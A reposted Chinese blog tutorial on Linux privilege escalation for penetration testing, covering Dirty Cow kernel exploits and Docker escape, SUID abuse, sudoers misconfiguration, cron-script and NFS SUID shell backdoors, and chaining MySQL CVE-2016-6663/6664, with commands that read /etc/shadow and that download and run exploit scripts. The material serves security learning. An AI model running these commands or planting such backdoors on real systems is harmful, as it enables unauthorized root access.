mysql提权方式linux_Linux提权的几种常用方式

最新推荐文章于 2024-05-12 17:30:39 发布
最新推荐文章于 2024-05-12 17:30:39 发布
阅读量436 收藏 1
点赞数
文章标签: mysql提权方式linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32124135/article/details/114860219
版权

5e4d06d5b867661d27de36577bd26fbd.png

本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。

在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。

1、内核漏洞提权

提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。

1.1 本地内核提权

(1)检测内核版本

# 查看系统发行版本

lsb_release -a

# 查看内核版本

uname -a

77836c731b0663d22e8ab06dfdbabb93.png

(2) 下载,编译生成exp文件

bypass@ubuntu:~$ make

f0f46b3235c1694d46753a258b8c9529.png

(3)执行成功,返回一个root权限的shell。

0dc628e1984c05151a7a6e1ad57050d2.png

1.2 利用DirtyCow漏洞实现Docker逃逸

(1)进入容器,编译POC并执行:

2952e8f69f1b40a21aa8fc63fec8a629.png

(2)在攻击者机器上,成功接收到宿主机反弹的shell。

ee83923f15933c0fad2c9c766ce737a6.png

1.3 Linux提权辅助工具

github项目地址:

https://github.com/mzet-/linux-exploit-suggester.git

(1)根据操作系统版本号自动查找相应提权脚本

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

984aa258b780df8e555cca761ba246c5.png

(2)根据提示下载poc,编译执行。

3fbf50dea730e474eedb2ee150359313.png

2、利用SUID提权

SUID是一种特殊权限,可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件,那么就可以在运行该文件的时候获得root用户权限。

(1)在Linux中查找可以用来提权的SUID文件

find / -perm -u=s -type f 2>/dev/null

f7973f72d7312b4d2d6b69fbd3822713.png

(2)通过find以root权限执行命令

cac9fad628389608ef2b9075e6efcb71.png

可用作Linux提权的命令及其姿势:

#Find

find pentestlab -execwhoami \;

#Vim

vim.tiny /etc/shadow

#awk

awk 'BEGIN{system("whoami")}'

#curl

curl file:///etc/shadow

#Bash

bash -p

#Less

less /etc/passwd

#Nmap

nmap --interactive

3、SUDO提权

普通用户在使用sudo执行命令的过程中,会以root方式执行命令。在很多场景里,管理员为了运维管理方便,sudoer配置文件错误导致提权。

(1)设置sudo免密码

$vi /etc/sudoers

在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2)查看sudo的权限

da20b1ab4542e29793634611aea49fde.png

4、计划任务

如果可以找到可以有权限修改的计划任务脚本,就可以修改脚本实现提权。本质上,就是文件权限配置不当。

(1)查看计划任务,找到有修改权限的计划任务脚本。

ls -l /etc/cron*

more /etc/crontab

70c390a7492b60ce59b3afc6817d7023.png

(2)在mysqlback.sh 添加 SUID shell后门,当定时任务以root再次执行的时候,可以获取root权限。

cp /bin/bash /tmp/shell

chmod u+s /tmp/shell

c5e81ea572b0da642a41fe333b920fc1.png

5、NFS提权

当服务器中存在NFS共享,开启no_root_squash选项时,如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。

(1)查看NFS服务器上的共享目录

sudo showmount -e 10.1.1.233

536251f1bda621597acb1fd7ceb4ac5d.png

(2)创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。

sudo mkdir -p /tmp/data

sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data

cp /bin/bash /tmp/data/shell

chmod u+s /tmp/data/shell

a1498a6cebe68d6108d851b5637882f0.png

(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。

a2d608722363a7559d08cbb0a7c2ff31.png

6、MySQL提权

MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限:

cd /var/www/html/

gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient

./mysql-privesc-race test 123456 localhost testdb

(2)利用CVE-2016-6664将Mysql权限提升为root权限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh

chmod 777 mysql-chowned.sh

./mysql-chowned.sh /var/log/mysql/error.log

【编辑推荐】

【责任编辑:武晓燕 TEL:(010)68476606】

点赞 0

飞奔的马达
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下忘记mysql密码的几种找回方法(推荐)
01-20
今天我们主要是讲一下关于linux忘记mysql密码处理方法,下面提供了5种linux忘记mysql密码找回方法哦。 方法一(先进入root权限): # /etc/init.d/mysql stop # mysqld_safe --user=mysql --skip-grant-tables --...
Linux提权mysql UDF提权
waxcj的博客
12-16 2012
linux mysql数据库提权
MySql数据库提权学习总结
Haakure的博客
10-21 548
sqlmap\data\udf\mysql\windows\64目录下生成一个dll的文件lib_mysqludf_sys.dll,这个我们就可以直接拿来利用。在windows系统中,配置文件my.ini在 MySql 安装的根目录下,也有可能在隐藏文件夹“ProgramData”下。在Linux系统中,MySQL的配置文件位于/etc/mysql/my.cnf。secure_file_priv是用来限制mysql数据库导出的位置/目录。安装路径下的data目录存放的是数据库的数据信息。
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1112
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2294
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDF、UDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
详细|Linux提权总结
st3pby的博客
11-06 7058
Linux提权总结
权限提升-MYSQL数据库提权
m0_65336233的博客
12-05 1775
提权漏洞-数据库提权
web安全:mysql提权总结篇
Candour_0的博客
01-15 376
web安全:mysql提权总结篇
Linux平台MySQL启动关闭方式总结
12-14
MySQL的启动方法有很多种,下面对比、总结这几种方法的一些差异和特性,下面实验的版本为MySQL 5.6。如有疏漏或不足,敬请指点一二。  1:使用mysqld启动、关闭MySQL服务  mysqld是MySQL的守护进程,我们可以用...
linux下安装mysqlmysql.sock问题
01-21
最近在linux上装Aphace,mysql,php时,遇到很多问题,在装apache和php遇到的问题要简单点,在百度,google上... 这个把我弄得几近崩溃,我在网上查找了很多的解决办法,大概有几种解决方案:  1.权限问题  2.修改/
linux+mysql入门1
08-08
在计算机领域,Linux是一种广泛使用的开源操作系统,而MySQL则是全球最受欢迎的关系型数据库管理系统之一。本篇将探讨Linux的基础知识以及如何与MySQL结合使用,帮助初学者入门。 首先,了解Linux的文件系统结构至...
mysql用户root提权
11-13
mysql用户root提mysql用户root提
Linux下WEBSHELL提权一技
06-15
Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
Linux提权—服务漏洞,以MySQL-UDF提权为例,2024Linux运维面试真题精选干货整理
2401_84170522的博客
04-10 225
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
MYSQL UDF手动提权及自动化工具使用
qq_45373631的博客
11-22 2785
UDF手工提权及自动化工具使用
四、MySQL 提权方式
xlsj雪松的博客
11-18 1726
Mysql提权方式总结
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 851
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
mysql buff cache_Linux中buff/cache内存占用过高解决办法
05-26
如果 buff/cache 内存占用过高,有几种可能的解决办法: 1. 调整 vm.dirty_ratio 和 vm.dirty_background_ratio 参数 vm.dirty_ratio 指定了内存中脏数据所占的最大比例,默认值为 20,意味着当内存中脏数据占用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值